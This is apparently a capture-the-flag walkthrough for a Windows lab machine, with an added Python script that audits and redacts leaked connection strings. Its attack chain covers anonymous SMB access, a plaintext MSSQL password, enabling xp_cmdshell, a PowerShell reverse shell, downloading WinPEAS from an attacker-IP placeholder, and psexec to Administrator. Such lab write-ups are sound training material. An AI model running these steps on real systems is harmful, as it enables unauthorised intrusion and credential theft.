1. Scanning & Enumeration
Initial scan (fast or full):
nmap -F XXX.XXX.XXX.XXX
# or
nmap -T4 -p- -A XXX.XXX.XXX.XXX
Open Ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
Observation:
- Ports 135 (MSRPC) and 445 (SMB) indicate Windows RPC and file-sharing services.
- Port 1433 exposes Microsoft SQL Server.
2. SMB Enumeration
Since SMB is exposed, enumerate shares anonymously:
smbclient -L //XXX.XXX.XXX.XXX -N
Discovered Share
- backups (no authentication required)
Access the share:
smbclient //XXX.XXX.XXX.XXX/backups -N
Inside the share, a configuration file is found containing plaintext credentials.
3. Credential Discovery
From the backup configuration file, a full MSSQL connection string is exposed:
Data Source=.;
User ID=ARCHETYPE\sql_svc;
Password=M3g4c0rp123;
Initial Catalog=Catalog;
Provider=SQLNCLI10.1;
Persist Security Info=True;
Auto Translate=False;
Extracted credentials:
ARCHETYPE/sql_svc : M3g4c0rp123
These credentials are reused to authenticate directly to Microsoft SQL Server.
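As an added defensive check (not part of the original walkthrough), the script below parses a connection string of the shape shown above and flags the properties that make it dangerous to leave in a share: a plaintext Password value, Persist Security Info=True, and SQL login instead of Windows authentication. The sample config, its password value and the function names are constructed for this example.

```python
import re

# Constructed sample shaped like the backup config in section 3; the password
# value is a made-up placeholder, not the one recovered from the box.
SAMPLE_CONFIG = (
    "Data Source=.;\n"
    "User ID=ARCHETYPE\\sql_svc;\n"
    "Password=Example!Passw0rd;\n"
    "Initial Catalog=Catalog;\n"
    "Provider=SQLNCLI10.1;\n"
    "Persist Security Info=True;\n"
    "Auto Translate=False;\n"
)

# Keys that carry a secret in OLE DB / SQL Native Client connection strings.
SECRET_KEYS = ("password", "pwd")


def parse_connection_string(text):
    """Split a 'key=value;' string (possibly wrapped over lines) into a dict with lowercase keys."""
    pairs = {}
    for part in text.replace("\n", "").split(";"):
        if "=" not in part:
            continue  # skip the empty trailing segment and stray text
        key, value = part.split("=", 1)
        pairs[key.strip().lower()] = value.strip()
    return pairs


def audit_connection_string(text):
    """Return findings explaining why this string must not sit on an unauthenticated share."""
    cfg = parse_connection_string(text)
    findings = []
    has_secret = any(cfg.get(k) for k in SECRET_KEYS)
    if has_secret:
        findings.append(f"plaintext secret for user '{cfg.get('user id', '?')}'")
    if cfg.get("persist security info", "").lower() == "true":
        findings.append("Persist Security Info=True keeps the password readable after connect")
    if has_secret and cfg.get("integrated security", "").lower() not in ("sspi", "true"):
        findings.append("SQL login in use; Integrated Security=SSPI would store no password at all")
    return findings


def redact_secrets(text):
    """Mask password values so the file can be quoted in a ticket or log safely."""
    return re.sub(r"(?i)\b(password|pwd)\s*=\s*[^;\n]*", r"\1=***", text)


if __name__ == "__main__":
    for finding in audit_connection_string(SAMPLE_CONFIG):
        print("FINDING:", finding)
    print(redact_secrets(SAMPLE_CONFIG))
```

Run it over every *.dtsConfig, *.config or *.udl file found on a share to get a list of files that need the secret moved into Windows authentication or a secrets store.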
4. MSSQL Access
Two valid approaches:
Option A – Impacket
impacket-mssqlclient ARCHETYPE/sql_svc@XXX.XXX.XXX.XXX -windows-auth
Option B – Custom MSSQL script
Use a script to authenticate and enable command execution.
5. Enable xp_cmdshell
Once authenticated, enable command execution:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
The SQL service account has sufficient privileges to execute OS commands.
6. Reverse Shell
Prepare listeners on the attacker machine:
nc -lvnp 4444
python3 -m http.server 80
Execute a Base64-encoded PowerShell reverse shell via xp_cmdshell:
xp_cmdshell "powershell -e <BASE64_ENCODED_PAYLOAD>"
Shell obtained as:
ARCHETYPE\sql_svc
7. Privilege Escalation Enumeration
Host WinPEAS on the attacker machine:
python3 -m http.server 80
Download WinPEAS from the target using PowerShell:
powershell -c "wget http://<ATTACKER_IP>/winPEASany_ofs.exe -OutFile winpeas.exe"
Execute:
C:\Users\Public\winpeas.exe
8. Credential Harvesting
WinPEAS reveals sensitive PowerShell history:
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
File contains Administrator credentials.
9. Administrator Access
Use Impacket to gain full SYSTEM / Administrator shell:
impacket-psexec Administrator@XXX.XXX.XXX.XXX
Successful command-line access as Administrator.
10. Flags
- User flag:
C:\Users\sql_svc\Desktop\user.txt
- Root flag:
C:\Users\Administrator\Desktop\root.txt